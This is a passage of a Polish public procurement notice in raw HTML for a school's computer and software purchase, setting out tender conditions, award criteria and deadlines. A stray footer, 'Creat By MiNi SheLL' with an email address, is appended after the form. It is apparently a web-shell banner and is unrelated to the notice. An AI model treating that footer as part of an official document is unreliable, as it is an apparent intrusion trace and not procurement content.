Specyfikacja jak w przypadku dostawy do ZS Sadlinki.

7)	Program biurowy  Licencja na 10 stanowisk
Specyfikacja jak w przypadku dostawy do ZS Sadlinki.

8)	Oprogramowanie do obróbki grafiki rastrowej ADOBE Photoshop Elements 14 + Premiere Elements 14 PL lub równoważny  Wieczysta licencja na 10 stanowisk wygenerowana dla odbiorcy
Specyfikacja jak w przypadku dostawy do ZS Sadlinki
<br /><br /><b>II.5) Główny kod CPV: </b>30200000-1<br /><b> Dodatkowe kody CPV:</b>48000000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                zamawiający nie określa szczegółowego warunku w tym zakresie
Informacje dodatkowe 

<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                zamawiający nie określa szczegółowego warunku w tym zakresie
Informacje dodatkowe 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                zamawiający nie określa szczegółowego warunku w tym zakresie
Informacje dodatkowe 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Zgodnie z art. 24 ust. 11 Pzp wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>warunki dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/03/2017, godzina: 08:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com